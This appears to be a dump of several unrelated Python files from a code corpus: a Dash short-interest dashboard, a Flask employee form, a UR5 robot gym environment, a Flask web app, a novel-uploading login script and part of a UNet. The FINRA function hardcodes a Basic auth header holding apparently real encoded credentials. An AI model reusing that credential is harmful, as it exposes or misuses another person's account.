'fromDate':start_dt,'toDate':end_dt, 'range':'OTM'})\n df['volatility'] = df['volatility'].apply(lambda x: pd.to_numeric(x, errors='coerce'))\n\n\n merge_cols = ['putCall', 'strikePrice', 'volatility','bid', 'ask','last',\n 'mark', 'delta', 'gamma', 'theta', 'vega', 'rho','expirationDateStr']\n\n df = df.dropna(subset=['volatility'])\n # df = df.loc[df['bid']>0]\n df = df.loc[df['bid']>0]\n # df = df.loc[df['openInterest']>0]\n # df = df.loc[df['totalVolume']>0]\n\n # Filter if required\n if (filter_fd == 'True') or (filter_fd==True):\n df = df.loc[df['expirationDateStr']>df['expirationDateStr'].min()].reset_index(drop=True)\n\n ## Initialize dataframe to merge on with first date\n first_dt = df['expirationDateStr'].unique()[0]\n mdf = df.loc[df['expirationDateStr']==first_dt][merge_cols]\n\n col_list1 = []\n for col in merge_cols:\n if col in ['putCall', 'strikePrice']:\n col_list1.append(col)\n else:\n colname1 = col+'_{}'.format(first_dt)\n col_list1.append(colname1)\n\n mdf.columns = col_list1\n\n\n for i in range(1, df['expirationDateStr'].nunique()):\n\n curr_date = df['expirationDateStr'].unique()[i]\n\n tempdf1 = df.loc[df['expirationDateStr']==curr_date][merge_cols]\n\n col_list1 = []\n for col in merge_cols:\n if col in ['putCall', 'strikePrice']:\n col_list1.append(col)\n else:\n colname1 = col+'_{}'.format(curr_date)\n col_list1.append(colname1)\n\n tempdf1.columns = col_list1\n\n mdf = mdf.merge(tempdf1, on=['putCall','strikePrice'], how='left')\n\n return mdf\n\ndef graphCalendarIV(sym, input_df, pc):\n\n mdf = input_df.copy()\n\n col_list = []\n cdict = {'CALL':'Greens', 'PUT':'Reds'}\n\n for col in list(mdf):\n if 'volatility' in col:\n col_list.append(col)\n\n fig = go.Figure()\n\n tpdf = mdf.copy()\n tpdf = tpdf.loc[tpdf['putCall']==pc]\n\n for col in col_list:\n tpdf[col] = tpdf[col].astype('float',errors='ignore')\n tpdf.dropna(subset=[col],inplace=True)\n\n dim_list = []\n grange = [tpdf[col_list].dropna().values.min(), tpdf[col_list].dropna().values.max()]\n\n for col in col_list:\n tdict = {'range':grange, 'label':col, 'values':tpdf[col]}\n dim_list.append(tdict)\n\n data=go.Parcoords(\n line = dict(color = tpdf['strikePrice'],\n colorscale = cdict[pc],\n cmax=tpdf['strikePrice'].max(),\n cmin=tpdf['strikePrice'].min(),\n showscale = True),\n dimensions = dim_list\n )\n fig.add_trace(data)\n\n fig.update_layout(title='Volatility Term Structure for {sym} {pc}'.format(sym=sym,pc=pc), title_y = 0.95, title_x=0.5, title_font_size=30)\n\n return {'data': fig.data,\n 'layout': fig.layout}\n################## END VOLATILITY TERM-STRUCTURE CODE ##################\n\n#### START short interest CODE ####\ndef parse_finra_df(input_r, num_cols=['shortParQuantity', 'shortExemptParQuantity', 'totalParQuantity']):\n\n dlist = input_r.text.split('\\n')\n\n dlist = [d.replace('\"','') for d in dlist]\n\n dlist2 = dlist[1:]\n dlist2 = [d.split(',') for d in dlist2]\n\n\n df = pd.DataFrame(data=dlist2,columns=dlist[0].split(','))\n\n for col in num_cols:\n df[col] = df[col].astype('int',errors='ignore').fillna(np.nan)\n df = df.dropna(subset=[col])\n df[col] = df[col].astype('int',errors='ignore').fillna(np.nan)\n\n return df\n\ndef pull_finra_dataset(group_name, dataset_name, body=None):\n\n headers = {'Authorization': 'Basic c2xhY2tlcjI5ODpXdGZjb3B0ZXIxOTgya2s='}\n base_finra_url = 'https://api.finra.org'\n data_req_str = base_finra_url+'/data/group/{group_name}/name/{dataset_name}'.format(group_name=group_name,dataset_name=dataset_name)\n\n r = requests.post(data_req_str,data=json.dumps(body), headers=headers)\n\n df = parse_finra_df(r)\n\n return df\n\ndef merge_price_and_finra(tda_api, finra_df, sym):\n\n ddf = get_historical_stock_data(tda_api, sym, finra_df['tradeReportDate'].min(), finra_df['tradeReportDate'].max(), frequencyType='daily')\n ddf['tradeReportDate'] = ddf['date'].apply(lambda x: str(x)[0:10])\n\n fdf2 = finra_df.groupby('tradeReportDate',as_index=False).sum()\n fdf3 = ddf.merge(fdf2, on='tradeReportDate')\n\n return fdf3\n\ndef fix_ndt_date(dt):\n\n dt2 = dt[-4:] + '-'+ dt[0:2] + '-' + dt[3:5]\n return dt2\n\ndef pull_nqt_si(curr_sym):\n\n body = {'method': \"BL_ShortInterest.SearchShortInterests\", 'params': [curr_sym], 'version': \"1.1\"}\n\n headers = {'Host': 'www.nasdaqtrader.com',\n 'Connection': 'keep-alive',\n 'Content-Length': '95',\n 'Content-type': 'application/json',\n 'Accept': '*/*',\n 'Origin': 'http://www.nasdaqtrader.com',\n 'Referer': 'http://www.nasdaqtrader.com/Trader.aspx?id=ShortInterest'}\n\n r = requests.post('http://www.nasdaqtrader.com/RPCHandler.axd', data=json.dumps(body),headers=headers)\n\n ## code to parse this god awful wall of text\n ndt_colnames = ['Settlement Date',\t'Short Interest', 'Percent Change',\t'Average Daily Share Volume','Days to Cover']\n r2 = r.text\n r2 = r2.replace('\\\\r\\\\n\\\\t\\\\r\\\\n\\\\t\\\\r\\\\n\\\\t\\\\t',';').replace('\\\\r\\\\n\\\\t\\\\r\\\\n\\\\t\\\\r\\\\n\\\\t\\\\t',';').replace('\\\\r\\\\n\\\\t\\\\t',';')\n r3 = r2.split(';')\n\n r4 = [r3[0][-10:]] + r3[1:]\n\n # Fix the last entry which has artifcats from http\n final_idx = r4[len(r4)-1].find('<')\n r4[len(r4)-1] = r4[len(r4)-1][0:final_idx]\n\n # reshape so we can put it in a dataframe\n rdata = np.array(r4).reshape(-1,5)\n ndt_df = pd.DataFrame(data=rdata, columns=ndt_colnames)\n ndt_df['tradeReportDate'] = ndt_df['Settlement Date'].apply(lambda x: fix_ndt_date(x))\n\n return ndt_df\n\ndef make_si_gdf(tda_api, curr_sym):\n\n df = pull_finra_dataset('OTCMarket', 'REGSHODAILY', body={\"compareFilters\": [ { \"compareType\": \"equal\", \"fieldName\": \"securitiesInformationProcessorSymbolIdentifier\", \"fieldValue\" : curr_sym}]})\n df2 = merge_price_and_finra(tda_api, df, curr_sym)\n\n try:\n ndt_df = pull_nqt_si(curr_sym)\n df3 = df2.merge(ndt_df, on='tradeReportDate',how='left')\n except:\n df3=df2\n\n return df3\n\ndef plot_short_candles(df):\n# https://plotly.com/python/candlestick-charts/\n\n fig = make_subplots(specs=[[{\"secondary_y\": True}]])\n\n candles = go.Candlestick(x=df['date'],\n open=df['open'],\n high=df['high'],\n low=df['low'],\n close=df['close'],\n name=df.at[0,'symbol'])\n\n fig.add_trace(candles,secondary_y = False)\n\n bar_graph = go.Bar(\n x = df['date'],\n y = df['volume'],\n marker_color='blue',\n opacity=0.5,\n name='tda Volume',\n visible='legendonly'\n )\n fig.add_trace(bar_graph,secondary_y = True)\n\n bar_graph = go.Bar(\n x = df['date'],\n y = df['totalParQuantity'],\n marker_color='darkblue',\n opacity=0.5,\n name='finra Volume',\n visible='legendonly'\n )\n fig.add_trace(bar_graph,secondary_y = True)\n\n bar_graph = go.Bar(\n x = df['date'],\n y = df['shortParQuantity'],\n marker_color='orange',\n opacity=0.5,\n name='short Volume'\n )\n fig.add_trace(bar_graph,secondary_y = True)\n\n try: # Not all symbols have confirmed short data\n bar_graph = go.Bar(\n x = df['date'],\n y = df['Short Interest'],\n marker_color='red',\n opacity=0.8,\n name='confirmed short interest'\n )\n fig.add_trace(bar_graph,secondary_y = True)\n except:\n pass\n\n fig.update_layout(legend_orientation=\"h\", barmode='overlay', height=800)\n fig.update_layout(legend=dict(x=-.1, y=1.1))\n\n return {'data': fig.data,\n 'layout': fig.layout}\n\n#### END short interest CODE ####\n\n\n\n\n# Get default day for the date picker\n\ncurr_unix = time.time()\ncurr_dt = ciso8601.parse_datetime(datetime.datetime.utcfromtimestamp(curr_unix).strftime('%Y-%m-%d'))\ndayofweek = curr_dt.weekday()\nwhile dayofweek != 4:\n curr_unix += 86400\n curr_dt = ciso8601.parse_datetime(datetime.datetime.utcfromtimestamp(curr_unix).strftime('%Y-%m-%d'))\n dayofweek = curr_dt.weekday()\n# print(dayofweek)\n\ndefault_date = datetime.datetime.utcfromtimestamp(curr_unix).strftime('%Y-%m-%d')\nmin_date = datetime.datetime.utcfromtimestamp(time.time()-86400)\n\nt1 = TDAmeritrade()\n\nall_symbols = pull_all_symbols(t1)\n\n################## DASH CODE ##################\n\n# external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\n\napp = dash.Dash(__name__)#, external_stylesheets=external_stylesheets)\n\nserver = app.server\n\napp.layout = html.Div([\n\n html.H1(\n children=\"Lanier's Short Interest Dashboard\",\n style={\n 'textAlign': 'center'\n }\n ),\n\n html.Div([\n dcc.Markdown(d(\"\"\"\n Choose Symbol\n \"\"\")),\n dcc.Dropdown(\n id='symbol-dropdown',\n options=[{'label': s, 'value': s} for s in all_symbols],\n value='TSLA'\n ),\n ]),\n\n # html.Div([\n # dcc.Markdown(d(\"\"\"\n # Choose date range:\n # \"\"\")),\n # dcc.DatePickerRange(\n # id='date-picker',\n # min_date_allowed=date(1900, 1, 1),\n # max_date_allowed=date(2017, 9, 19),\n # initial_visible_month=date(2020, 1, 1),\n # end_date=date=datetime.datetime.now()\n # )\n # ],style={'width': '24%', 'display': 'inline-block'}),\n\n html.Div([\n dcc.Graph(id='short-graph') ]),\n\n\n])\n\n\n# Need to just filter the DF to within the selected ranges, then run the get_graph_df\n# function to get the code necessary to create the graph. Pretty straightforward\n### CALLBACK CODE ###\n\n@app.callback(\n dash.dependencies.Output('short-graph', 'figure'),\n [dash.dependencies.Input('symbol-dropdown', \"value\")])\n # dash.dependencies.Input('date-picker', 'start_date'),\n # dash.dependencies.Input('date-picker', 'end_date')]])\ndef update_figure(sym): #, start_dt, end_dt):\n\n sdf = make_si_gdf(t1, sym)\n sgraph = plot_short_candles(sdf)\n return sgraph\n\n# @app.callback(\n# dash.dependencies.Output('dgx-graph', 'figure'),\n# [dash.dependencies.Input('dix-date', \"date\"),\n# dash.dependencies.Input('gex-rolling', \"value\")])\n# def update_dix(ddate, grolling):\n#\n# date1 = str(ddate)[0:10]\n#\n# dgraph = plot_dix(ddate, dix_rolling=grolling, gex_rolling=grolling)\n#\n# return dgraph\n#\n# @app.callback(\n# [dash.dependencies.Output('vix0', 'children'),\n# dash.dependencies.Output('vix1', 'children'),\n# dash.dependencies.Output('vix2', 'children')],\n# [dash.dependencies.Input('update-vix-button', \"n_clicks\")])\n# def update_vix(nclicks):\n#\n# vix_vals = dash_vix_values(t1)\n#\n# vix0_vals = vix_vals[0]\n# vix1_vals = vix_vals[1]\n# vix2_vals = vix_vals[2]\n#\n# v0 = 'Neardate: {nd} // Fardate: {fd} // VIX: {v}'.format(nd=vix0_vals[0], fd=vix0_vals[1], v=vix0_vals[2])\n# v1 = 'Neardate: {nd} // Fardate: {fd} // VIX: {v}'.format(nd=vix1_vals[0], fd=vix1_vals[1], v=vix1_vals[2])\n# v2 = 'Neardate: {nd} // Fardate: {fd} // VIX: {v}'.format(nd=vix2_vals[0], fd=vix2_vals[1], v=vix2_vals[2])\n#\n# return v0,v1,v2\n\n\n\n\nif __name__ == '__main__':\n app.run_server(debug=True)#,host='0.0.0.0', port=9000)\n","sub_path":"ShortInterestDash/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":66157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"284998513","text":"from datetime import date\n\nfrom citywok_ms.fields import BlankCountryField, BlankSelectField\nfrom citywok_ms.models import Employee\nfrom citywok_ms.utils import ID, SEX\nfrom flask_wtf import FlaskForm\nfrom wtforms import HiddenField, StringField, SubmitField, TextAreaField\nfrom wtforms.fields.html5 import (DateField, DecimalField, EmailField,\n IntegerField, TelField)\nfrom wtforms.validators import (Email, InputRequired, NumberRange, Optional,\n ValidationError)\nfrom wtforms_alchemy import QuerySelectField\nfrom wtforms_alchemy.utils import choice_type_coerce_factory\nfrom wtforms_components import SelectField\n\n\nclass EmployeeForm(FlaskForm):\n \"\"\"\n Form to create or update Employee\n \"\"\"\n hide_id = HiddenField()\n first_name = StringField(label='First Name',\n validators=[InputRequired()])\n last_name = StringField(label='Last Name',\n validators=[InputRequired()])\n zh_name = StringField(label='Chinese Name',\n filters=[lambda x: x or None],\n validators=[Optional()])\n sex = BlankSelectField(label='Sex',\n choices=SEX,\n coerce=choice_type_coerce_factory(\n Employee.sex.type),\n message='---',\n validators=[InputRequired()])\n birthday = DateField(label='Birthday',\n validators=[Optional()])\n contact = TelField(label='Contact',\n validators=[Optional()],\n filters=[lambda x: x or None])\n email = EmailField(label='E-mail',\n validators=[Optional(),\n Email()],\n filters=[lambda x: x or None])\n id_type = BlankSelectField(label='ID Type',\n validators=[InputRequired()],\n choices=ID,\n coerce=choice_type_coerce_factory(\n Employee.id_type.type),\n message='---')\n id_number = StringField(label='ID Number',\n validators=[InputRequired()])\n id_validity = DateField(label='ID Validity',\n validators=[InputRequired()])\n nationality = BlankCountryField(label='Nationality',\n message='---',\n validators=[InputRequired()])\n nif = IntegerField(label='NIF',\n validators=[Optional()])\n niss = IntegerField(label='NISS',\n validators=[Optional()])\n employment_date = DateField(label='Employment Date',\n validators=[Optional()])\n total_salary = DecimalField(label='Total Salary',\n validators=[InputRequired(),\n NumberRange(min=0)])\n taxed_salary = DecimalField(label='Taxed Salary',\n validators=[InputRequired(),\n NumberRange(min=0)],\n default=635)\n\n remark = TextAreaField(label='Remark',\n validators=[Optional()],\n filters=[lambda x: x or None])\n\n submit = SubmitField(label='Add')\n update = SubmitField(label='Update')\n\n def validate_id_validity(self, id_validity):\n \"\"\"\n Validate the id_validity field, check if it's still valid\n \"\"\"\n if (self.id_validity.data and self.id_validity.data < date.today()):\n raise ValidationError('ID has expired')\n\n def validate_nif(self, nif):\n '''\n Validate the nif field, to avoid duplicate nif number\n '''\n e = Employee.query.filter_by(nif=nif.data).first()\n if nif.data and e and (e.id != self.hide_id.data):\n raise ValidationError('This NIF already existe')\n\n def validate_niss(self, niss):\n '''\n Validate the niss field, to avoid duplicate niss number\n '''\n e = Employee.query.filter_by(niss=niss.data).first()\n if niss.data and e and (e.id != self.hide_id.data):\n raise ValidationError('This NISS already existe')\n","sub_path":"citywok_ms/employee/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":4382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"146534921","text":"import numpy as np\nimport numpy\nimport mujoco_py\nimport json\nfrom gym.envs.robotics import rotations, robot_env, utils\nimport os\n\n\ndef goal_distance(goal_a, goal_b):\n assert goal_a.shape == goal_b.shape\n return np.linalg.norm(goal_a - goal_b, axis=-1)\n\n\nclass Ur5Env(robot_env.RobotEnv):\n \"\"\"Superclass for all Ur5 environments.\n \"\"\"\n\n def __init__(\n self, model_path, n_substeps, distance_threshold, initial_qpos, reward_type, ctrl_type=\"joint\"\n ):\n \"\"\"Initializes a new Fetch environment.\n\n Args:\n model_path (string): path to the environments XML file\n n_substeps (int): number of substeps the simulation runs on every call to step\n distance_threshold (float): the threshold after which a goal is considered achieved\n initial_qpos (array): an array of values that define the initial configuration\n reward_type ('sparse' or 'dense'): the reward type, i.e. sparse or dense\n \"\"\"\n self.distance_threshold = distance_threshold\n self.reward_type = reward_type\n self.ctrl_type = ctrl_type\n\n super(Ur5Env, self).__init__(\n model_path=model_path, n_substeps=n_substeps, n_actions=6,\n initial_qpos=initial_qpos)\n\n # GoalEnv methods\n # ----------------------------\n\n def compute_reward(self, achieved_goal, goal, info):\n # Compute distance between goal and the achieved goal.\n d = goal_distance(achieved_goal, goal)\n if self.reward_type == 'sparse':\n return -(d > self.distance_threshold).astype(np.float32)\n else:\n return -d\n\n # RobotEnv methods\n # ----------------------------\n\n def _step_callback(self):\n a = 0\n # not implemented\n def set_state(self, qpos):\n old_state = self.sim.get_state()\n new_state = mujoco_py.MjSimState(old_state.time, qpos, old_state.qvel,\n old_state.act, old_state.udd_state)\n self.sim.set_state(new_state)\n self.sim.forward()\n\n def _set_action(self, action):\n assert action.shape == (6,)\n action = action.copy() # ensure that we don't change the action outside of this scope\n\n if self.ctrl_type == \"joint\":\n action *= 0.05 # limit maximum change in position\n # Apply action to simulation.\n utils.ctrl_set_action(self.sim, action)\n elif self.ctrl_type == \"cartesian\":\n dx = action.reshape(6, 1)\n jacp = self.sim.data.get_body_jacp(name=\"gripper_dummy_heg\").reshape(3, 6)\n jacr = self.sim.data.get_body_jacr(name=\"gripper_dummy_heg\").reshape(3, 6)\n jac = numpy.vstack((jacp, jacr))\n dq = 0.00001*numpy.linalg.lstsq(jac, dx)[0].reshape(6, )\n # print(sum(abs(sim.data.qpos-sim.data.ctrl)))\n utils.ctrl_set_action(self.sim, dq)\n\n def _get_obs(self):\n # positions\n force = self.sim.data.sensordata\n x_pos = self.sim.data.get_body_xpos(\"gripper_dummy_heg\")\n x_quat = self.sim.data.get_body_xquat(\"gripper_dummy_heg\")\n q_pos = self.sim.data.qpos\n\n obs = np.concatenate([\n x_pos, x_quat, q_pos, force\n ])\n\n return {\n 'observation': obs.copy(),\n 'achieved_goal': np.concatenate([x_pos, x_quat]).copy(),\n 'desired_goal': self.goal.copy(),\n }\n\n def _viewer_setup(self):\n body_id = self.sim.model.body_name2id('body_link')\n lookat = self.sim.data.body_xpos[body_id]\n for idx, value in enumerate(lookat):\n self.viewer.cam.lookat[idx] = value\n self.viewer.cam.distance = 2.5\n self.viewer.cam.azimuth = 132.\n self.viewer.cam.elevation = -14.\n\n def _render_callback(self):\n # Visualize target.\n a=0\n\n def _reset_sim(self):\n qpos = np.array([1.5708, 0, -1.5708, 1.5708, 1.5708, 1.5708])\n self.sim.data.ctrl[:] = qpos\n self.set_state(qpos)\n self.sim.forward()\n return True\n\n def _sample_goal(self):\n home_path = os.getenv(\"HOME\")\n goal_path = os.path.join(*[home_path, \"DRL_SetBot-RearVentilation\", \"experiment_configs\", \"goal.json\"])\n\n with open(goal_path, encoding='utf-8') as file:\n goal = json.load(file)\n return numpy.concatenate([goal['xpos'], goal['xquat']]).copy()\n\n def _is_success(self, achieved_goal, desired_goal):\n d = goal_distance(achieved_goal, desired_goal)\n print((d < self.distance_threshold).astype(np.float32))\n return (d < self.distance_threshold).astype(np.float32)\n\n def _env_setup(self, initial_qpos):\n qpos = np.array([1.5708, 0, -1.5708, 1.5708, 1.5708, 1.5708])\n self.sim.data.ctrl[:] = qpos\n self.set_state(qpos)\n self.sim.forward()\n\n\n def render(self, mode='human', width=500, height=500):\n return super(Ur5Env, self).render(mode, width, height)\n","sub_path":"gym/envs/robotics/ur5_env.py","file_name":"ur5_env.py","file_ext":"py","file_size_in_byte":4953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"389785174","text":"#!/usr/bin/python3\n\"\"\"Simple Flask app, with additional route\"\"\"\nfrom flask import Flask, abort, render_template\nfrom models import storage\nfrom models.state import State\nfrom models.amenity import Amenity\nfrom models.place import Place\nfrom uuid import uuid4\n\napp = Flask(__name__)\napp.url_map.strict_slashes = False\n\n\n# begins rendering\n@app.route('/3-hbnb')\ndef filters():\n \"\"\"load filters\"\"\"\n cache_id = uuid4()\n states = storage.all(State).values()\n amenities = storage.all(Amenity).values()\n places = storage.all(Place).values()\n return render_template('3-hbnb.html',\n states=states,\n amenities=amenities,\n places=places,\n cache_id=cache_id)\n\n\n@app.teardown_appcontext\ndef do_teardown(self):\n \"\"\"Closes session\"\"\"\n storage.close()\n\n\nif __name__ == '__main__':\n \"\"\"Main Flask App\"\"\"\n app.run(host='0.0.0.0', port=5000)\n","sub_path":"web_dynamic/3-hbnb.py","file_name":"3-hbnb.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"405874008","text":"\"\"\"save novel content into anyview website\r\n\"\"\"\r\nimport time\r\nfrom os import path, remove\r\n\r\nimport requests\r\nfrom robobrowser import RoboBrowser, forms\r\n\r\nfrom loguru import logger\r\nfrom util import config\r\n\r\nbase_path = path.split(path.realpath(__file__))[0]\r\nRequestsFail = 'requests failed: {url}\\nconnetion error: {err}'\r\n\r\ndef login(username, password, url):\r\n browser = RoboBrowser(parser='html.parser', history=True,\r\n timeout=30, tries=5, multiplier=0.3)\r\n\r\n try:\r\n browser.open(url)\r\n except requests.ConnectionError as e:\r\n logger.error(RequestsFail, url=url, err=e)\r\n return None\r\n except:\r\n logger.error('request failed: {url}', url=url)\r\n logger.exception('detail')\r\n return None\r\n\r\n # login\r\n login_form = browser.get_form(id='log-in')\r\n login_form['account'].value = username\r\n login_form['password'].value = password\r\n browser.submit_form(login_form)\r\n # access account\r\n account = browser.find(href='/account')\r\n if account is None:\r\n logger.info(\"page detail is: \\n{}\", browser.find())\r\n return None\r\n try:\r\n browser.follow_link(account)\r\n except requests.ConnectionError as e:\r\n logger.error(RequestsFail, url=browser.url, err=e)\r\n return None\r\n except:\r\n logger.error('request failed: {url}', url=browser.url)\r\n logger.exception('detail')\r\n return None\r\n\r\n return browser\r\n\r\n\r\ndef upload(novel_info, content):\r\n # get apan config\r\n username = config.get('apan', 'User')\r\n password = config.get('apan', 'Pass')\r\n apan_url = config.get('apan', 'Url')\r\n # login\r\n browser = login(username, password, apan_url)\r\n if browser is None:\r\n logger.error(\"login apan failed\")\r\n time.sleep(10)\r\n return False\r\n # delete\r\n browser = delete(browser, novel_info['title'])\r\n if browser is None:\r\n logger.error(\"delete novel failed\")\r\n time.sleep(10)\r\n return False\r\n upload_form = browser.get_forms()[0]\r\n # add upload action field\r\n upload_action_str = ''\r\n upload_action = forms.fields.Input(upload_action_str)\r\n upload_form.add_field(upload_action)\r\n # add upload file field\r\n pth = path.join(base_path, 'novels', novel_info['title'] + '.txt')\r\n # submit upload form\r\n try:\r\n with open(pth, 'w', encoding='utf-8') as f:\r\n f.write(file_content(novel_info, content))\r\n except (OSError, IOError) as e:\r\n logger.error('write file error: {}', e)\r\n return False\r\n except:\r\n logger.exception('detail')\r\n return False\r\n try:\r\n with open(pth, 'r', encoding='utf-8') as f:\r\n upload_form['file_to_upload'].value = f\r\n browser.submit_form(upload_form)\r\n except requests.ConnectionError as e:\r\n logger.error(RequestsFail, url=browser.url, err=e)\r\n return False\r\n except (OSError, IOError) as e:\r\n logger.error('read file error: {}', e)\r\n return False\r\n except:\r\n logger.exception(\"detail\")\r\n return False\r\n # delete temp file\r\n write_in_local = config.getboolean('app', 'WriteInLocal')\r\n if not write_in_local and path.exists(pth):\r\n remove(pth)\r\n\r\n return True\r\n\r\n\r\ndef delete(browser, title):\r\n form = browser.get_forms()[1]\r\n # find old file and delete it\r\n table = browser.find(class_='table table-bordered table-striped')\r\n if table is None:\r\n logger.info(\"page detail is: \\n{}\", browser.find())\r\n return None\r\n for tr in table.tbody.find_all('tr'):\r\n if title == tr.find('td', class_=\"item-title\").string[1:-4]:\r\n button = tr.find('button')\r\n nid = button['value']\r\n delete_button_str = str(button)\r\n delete_action = forms.fields.Input(delete_button_str)\r\n form.add_field(delete_action)\r\n form['file_id'].value = nid\r\n try:\r\n browser.submit_form(form)\r\n return browser\r\n except requests.ConnectionError as e:\r\n logger.error(RequestsFail, url=browser.url, err=e)\r\n return None\r\n except:\r\n logger.error('request failed: {url}', url=browser.url)\r\n logger.exception(\"detail\")\r\n return None\r\n\r\n return browser\r\n\r\n\r\ndef file_content(novel_info, content):\r\n return '\\n'.join([\r\n '标题:' + novel_info['title'],\r\n '作者:' + novel_info['author'],\r\n '类型:' + novel_info['type'],\r\n '日期:' + novel_info['date'],\r\n content\r\n ])\r\n\r\n\r\nif __name__ == \"__main__\":\r\n ni = {\r\n 'id': 123,\r\n 'title': '测试文件',\r\n 'author': '大西瓜',\r\n 'date': '2019-3-6',\r\n 'type': '其他',\r\n 'link': 'http://www.example.com'\r\n }\r\n content = '这是一个新的abc测试文件。\\n'\r\n upload(ni, content)\r\n","sub_path":"pipline/apan.py","file_name":"apan.py","file_ext":"py","file_size_in_byte":5031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"313762376","text":"import torch\r\nimport torchaudio\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport os\r\nimport time\r\n\r\n#declare a network (unet)\r\ndef conv3x3(in_channels, out_channels, stride=1,\r\n padding=1, bias=True, groups=1):\r\n return nn.Conv2d(\r\n in_channels,\r\n out_channels,\r\n kernel_size=3,\r\n stride=stride,\r\n padding=padding,\r\n bias=bias,\r\n groups=groups)\r\n\r\ndef upconv2x2(in_channels, out_channels, mode='transpose'):\r\n if mode == 'transpose':\r\n return nn.ConvTranspose2d(\r\n in_channels,\r\n out_channels,\r\n kernel_size=2,\r\n stride=2)\r\n else:\r\n # out_channels is always going to be the same\r\n # as in_channels\r\n return nn.Sequential(\r\n nn.Upsample(mode='bilinear', scale_factor=2),\r\n conv1x1(in_channels, out_channels))\r\n\r\ndef conv1x1(in_channels, out_channels, groups=1):\r\n return nn.Conv2d(\r\n in_channels,\r\n out_channels,\r\n kernel_size=1,\r\n groups=groups,\r\n stride=1)\r\n\r\n\r\nclass DownConv(nn.Module):\r\n \"\"\"\r\n A helper Module that performs 2 convolutions and 1 MaxPool.\r\n A ReLU activation follows each convolution.\r\n \"\"\"\r\n def __init__(self, in_channels, out_channels, pooling=True):\r\n super(DownConv, self).__init__()\r\n\r\n self.in_channels = in_channels\r\n self.out_channels = out_channels\r\n self.pooling = pooling\r\n\r\n self.conv1 = conv3x3(self.in_channels, self.out_channels)\r\n self.conv2 = conv3x3(self.out_channels, self.out_channels)\r\n\r\n if self.pooling:\r\n self.pool = nn.MaxPool2d(kernel_size=2, stride=2)\r\n\r\n def forward(self, x):\r\n x = F.relu(self.conv1(x))\r\n x = F.relu(self.conv2(x))\r\n before_pool = x\r\n if self.pooling:\r\n x = self.pool(x)\r\n return x, before_pool\r\n\r\n\r\nclass UpConv(nn.Module):\r\n \"\"\"\r\n A helper Module that performs 2 convolutions and 1 UpConvolution.\r\n A ReLU activation follows each convolution.\r\n \"\"\"\r\n def __init__(self, in_channels, out_channels,\r\n merge_mode='concat', up_mode='transpose'):\r\n super(UpConv, self).__init__()\r\n\r\n self.in_channels = in_channels\r\n self.out_channels = out_channels\r\n self.merge_mode = merge_mode\r\n self.up_mode = up_mode\r\n\r\n self.upconv = upconv2x2(self.in_channels, self.out_channels,\r\n mode=self.up_mode)\r\n\r\n if self.merge_mode == 'concat':\r\n self.conv1 = conv3x3(\r\n 2*self.out_channels, self.out_channels)\r\n else:\r\n # num of input channels to conv2 is same\r\n self.conv1 = conv3x3(self.out_channels, self.out_channels)\r\n self.conv2 = conv3x3(self.out_channels, self.out_channels)\r\n\r\n\r\n def forward(self, from_down, from_up):\r\n \"\"\" Forward pass\r\n Arguments:\r\n from_down: tensor from the encoder pathway\r\n from_up: upconv'd tensor from the decoder pathway\r\n \"\"\"\r\n from_up = self.upconv(from_up)\r\n if self.merge_mode == 'concat':\r\n x = torch.cat((from_up, from_down), 1)\r\n else:\r\n x = from_up + from_down\r\n x = F.relu(self.conv1(x))\r\n x = F.relu(self.conv2(x))\r\n return x\r\n\r\n\r\nclass UNet(nn.Module):\r\n \"\"\" `UNet` class is based on https://arxiv.org/abs/1505.04597\r\n The U-Net is a convolutional encoder-decoder neural network.\r\n Contextual spatial information (from the decoding,\r\n expansive pathway) about an input tensor is merged with\r\n information representing the localization of details\r\n (from the encoding, compressive pathway).\r\n Modifications to the original paper:\r\n (1) padding is used in 3x3 convolutions to prevent loss\r\n of border pixels\r\n (2) merging outputs does not require cropping due to (1)\r\n (3) residual connections can be used by specifying\r\n UNet(merge_mode='add')\r\n (4) if non-parametric upsampling is used in the decoder\r\n pathway (specified by upmode='upsample'), then an\r\n additional 1x1 2d convolution occurs after upsampling\r\n to reduce channel dimensionality by a factor of 2.\r\n This channel halving happens with the convolution in\r\n the tranpose convolution (specified by upmode='transpose')\r\n \"\"\"\r\n\r\n def __init__(self, num_classes, in_channels=1, depth=5,\r\n start_filts=64, up_mode='transpose',\r\n merge_mode='concat'):\r\n \"\"\"\r\n Arguments:\r\n in_channels: int, number of channels in the input tensor.\r\n Default is 3 for RGB images.\r\n depth: int, number of MaxPools in the U-Net.\r\n start_filts: int, number of convolutional filters for the\r\n first conv.\r\n up_mode: string, type of upconvolution. Choices: 'transpose'\r\n for transpose convolution or 'upsample' for nearest neighbour\r\n upsampling.\r\n \"\"\"\r\n super(UNet, self).__init__()\r\n\r\n if up_mode in ('transpose', 'upsample'):\r\n self.up_mode = up_mode\r\n else:\r\n raise ValueError(\"\\\"{}\\\" is not a valid mode for \"\r\n \"upsampling. Only \\\"transpose\\\" and \"\r\n \"\\\"upsample\\\" are allowed.\".format(up_mode))\r\n\r\n if merge_mode in ('concat', 'add'):\r\n self.merge_mode = merge_mode\r\n else:\r\n raise ValueError(\"\\\"{}\\\" is not a valid mode for\"\r\n \"merging up and down paths. \"\r\n \"Only \\\"concat\\\" and \"\r\n \"\\\"add\\\" are allowed.\".format(up_mode))\r\n\r\n # NOTE: up_mode 'upsample' is incompatible with merge_mode 'add'\r\n if self.up_mode == 'upsample' and self.merge_mode == 'add':\r\n raise ValueError(\"up_mode \\\"upsample\\\" is incompatible \"\r\n \"with merge_mode \\\"add\\\" at the moment \"\r\n \"because it doesn't make sense to use \"\r\n \"nearest neighbour to reduce \"\r\n \"depth channels (by half).\")\r\n\r\n self.num_classes = num_classes\r\n self.in_channels = in_channels\r\n self.start_filts = start_filts\r\n self.depth = depth\r\n\r\n self.down_convs = []\r\n self.up_convs = []\r\n\r\n # create the encoder pathway 